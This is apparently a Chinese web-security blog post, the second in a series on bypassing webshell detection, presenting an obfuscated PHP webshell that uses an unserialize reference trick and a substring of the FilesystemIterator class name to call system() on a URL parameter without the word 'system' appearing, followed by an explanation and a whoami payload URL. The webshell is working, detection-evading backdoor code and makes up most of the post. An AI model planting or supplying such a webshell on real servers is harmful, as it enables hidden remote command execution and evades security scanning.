WEB安全--RCE--webshell bypass2

继WEB安全--RCE--webshell bypass的补充:

六、PHP反序列化

webshell:

php 复制代码
<?php
$s= 
unserialize('a:2:{i:0;O:8:"stdClass":1:{s:1:"a";i:1;}i:1;r:2;}');
$c = "123";
$arr= get_declared_classes();
$i=0;

for($i;$i<count($arr);$i++){
 $i++;
 $s[1]->a=$_GET['a'];
 if($i<97 || $i>=98){
 continue;
 }
 $c=$s[0]->a;
 print(substr(get_declared_classes()[55],4,6)($c));
}
?>

原理:

打印$s:

可以看到$s反序列化后有两个值,但是源码中似乎只有一个stdClass;原因是[0]是由[1]引用复制后的值,可以理解为**[1]的变化会导致[0]的变化**。

打印$arr:

基于上述两个打印值对源码进行分析,我们不难得出其原理:

一开始$c = "123",进入for循环;

s\[1\]-\>a = _GET['a']一直在接收我们的传参,不过由于if判断,当$i = 97时才会进入下一步;

此时s\[1\]-\>a的值是我们URL传递的参数,而c = s\[0\]-\>a,且s[1]->a 的值会同步影响s\[0\]-\>a,所以c = $_GET['a'];

get_declared_classes()[55]对应的是FilesystemIterator,通过截取取出system;

最后 print(substr(get_declared_classes()[55],4,6)($c)) 就会变成:

print(system($_GET['a']))

payload:

php 复制代码
http://127.0.0.1/rce/bypass.php?a=whoami
相关推荐
深盾科技1 小时前
如何读懂Mach-O:构建macOS和iOS应用安全的第一道认知防线
安全·macos·ios
wanhengidc3 小时前
云手机ARM架构都具有哪些挑战
运维·服务器·安全·游戏·智能手机
KKKlucifer3 小时前
Gartner 2025 中国网络安全成熟度曲线深度解读:AI 安全如何重构防御逻辑
人工智能·安全·web安全
FreeBuf_4 小时前
微软警示AI驱动的钓鱼攻击:LLM生成的SVG文件绕过邮件安全检测
人工智能·安全·microsoft
灵雀云6 小时前
灵雀云六度入选 Gartner 中国 ICT 技术成熟度曲线报告,ACP以安全、稳定、智能三大核心能力定义企业级云原生数字底座
安全·云原生
Bruce_Liuxiaowei6 小时前
Kerberos协议深度解析:工作原理与安全实践
运维·windows·安全·网络安全
RuningPigNO16 小时前
企业在拥抱 Al技术过程中面临安全风险是什么
安全
粟悟饭&龟波功7 小时前
【网络安全】四、中级篇:SQL注入详解
sql·安全·web安全
FIN666816 小时前
新天力:食品容器安全与创新的领航者
科技·安全·产品运营·创业创新·制造
alex10017 小时前
BeaverTails数据集:大模型安全对齐的关键资源与实战应用
人工智能·算法·安全